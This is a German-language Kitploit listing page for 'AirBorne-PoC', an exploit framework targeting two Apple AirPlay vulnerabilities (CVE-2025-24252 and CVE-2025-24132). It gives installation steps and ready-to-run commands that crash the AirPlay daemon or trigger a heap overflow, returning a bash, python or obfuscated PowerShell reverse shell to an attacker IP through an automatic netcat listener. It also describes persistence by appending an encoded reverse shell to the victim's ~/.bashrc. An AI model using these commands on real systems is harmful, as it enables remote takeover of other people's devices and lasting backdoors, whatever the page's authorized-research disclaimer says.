Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
AirBorne-PoC — PoC für CVE-2025-24252 & CVE-2025-24132 | Kitploit
Tools/GitHubGitHub/ekomssavior/airborne-poc
PersistenzmechanismenSchwachstellenanalyseExploitationShellcodePost-ExploitationCommand and ControlRemote-Access-ToolPayload-EntwicklungBinary-Exploitation
GitHubekomssavior/airborne-poc

AirBorne-PoC

PoC für CVE-2025-24252 & CVE-2025-24132

1642743vor 8 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
Teilen

AirBorne PoC Framework – Elite RCE Edition

Vollständiges PoC Framework für CVE-2025-24252 & CVE-2025-24132
Von ekomsSavior |

AirBorne ist ein kombiniertes Proof-of-Concept (PoC) Framework, das zwei schwerwiegende Schwachstellen im Apple AirPlay-Dienst adressiert. Es enthält einen vollständigen Crash-Trigger und einen funktionierenden Reverse-Shell-Exploit mit optionaler Persistenz, Listener und mehreren Payload-Formaten – alles in einem Skript.

Auf der Suche nach der Originalversion?
Die Legacy-Edition ist weiterhin im legacy Branch dieses Repositorys verfügbar.
Um sie auszuchecken:

root@kitploit:~
git checkout legacy

Behandelte CVEs

CVE-2025-24252 – mDNS TXT Record Absturz

  • Löst einen Absturz des AirPlayReceiver-Daemons durch ein fehlerhaftes mDNS-Paket aus.
  • Funktioniert über UDP-Broadcast auf Port 5353

CVE-2025-24132 – Heap Overflow → Reverse Shell (RCE)

  • Löst einen Heap-Overflow im AirPlay-TCP-Dienst auf Port 7000 aus.
  • Unterstützt Reverse-Shell-Payloads für bash, python und PowerShell.
Tool herunterladen
  • Enthält optionale Persistenz mittels .bashrc-Injection (Linux).

  • Erste Schritte

    1. Repo klonen

    root@kitploit:~
    git clone https://github.com/ekomsSavior/AirBorne-PoC.git
    cd AirBorne-PoC
    

    2. Abhängigkeiten installieren

    root@kitploit:~
    sudo apt update
    sudo apt install -y python3-scapy netcat
    

    Ablauf zur Laufzeit

    Das einzelne Skript airborne.py enthält beide PoCs und die gesamte Logik:

    • Wählen Sie eine CVE mittels --exploit aus
    • Legen Sie einen Reverse-Shell-Payload mittels --payload fest
    • Startet automatisch einen Netcat-Listener für Sie
    • Aktiviert optional Persistenz auf dem Ziel mittels --persistent

    Anwendungsbeispiele

    Ziel mit mDNS-Paket zum Absturz bringen (CVE-2025-24252)

    root@kitploit:~
    sudo python3 airborne.py --exploit 24252 --interface wlan0
    

    Erfordert ein Interface im Monitor-Modus.


    Heap Overflow → RCE starten (CVE-2025-24132)

    Starten Sie den vollständigen Exploit mit der Standard-Bash-Shell:

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99
    

    Wählen Sie stattdessen die Python-Shell:

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python
    

    Aktivieren Sie echte Persistenz auf Linux-Zielen:

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent
    

    Nur Shell-Befehlseinschleusung

    root@kitploit:~
    sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"
    

    Payload-Optionen

    PayloadBeschreibung
    bashStandard-Bash-Reverse-Shell über TCP
    pythonPython-basierte Reverse-Shell mit socket und pty
    powershellVollständiger Windows PowerShell RCE-Payload (verschleiert)

    Persistenzmodus

    Bei Verwendung von --persistent hängt das Skript den codierten Reverse-Shell-Payload an die folgende Datei des Ziels an:

    root@kitploit:~
    ~/.bashrc
    

    Dies stellt sicher, dass Ihnen jedes Mal eine Shell zurückgegeben wird, wenn der Benutzer sich anmeldet oder ein Terminal geöffnet wird.


    Wartungshinweise

    • Reverse-Shells werden mit base64 codiert und nach dem Buffer-Overflow ausgeliefert.
    • Alle Payloads werden über Port 7000 gesendet.
    • mDNS-Pakete gehen über UDP 5353 und erfordern Raw-Socket-Berechtigungen.
    • Stellen Sie sicher, dass die IP Ihrer Angriffsbox vom Zielgerät erreichbar ist.
    • Das Skript behandelt grundlegende Fehlerfälle und schlägt bei geschlossenen Ports still fehl.

    Ethischer Haftungsausschluss

    Dieses Projekt ist ausschließlich für Bildungs-, ethische und autorisierte Forschungszwecke gedacht.

    • Sie müssen die ausdrückliche Erlaubnis haben, das Zielsystem zu testen.
    • Sie übernehmen die vollständige Verantwortung für alle ergriffenen Maßnahmen.

    Unbefugte Ausnutzung von Systemen ist illegal und unethisch.


    Danksagungen

    • Erstellt von ekomsSavior
    • Inspiriert von realen CVEs und Exploit-Entwicklungsforschung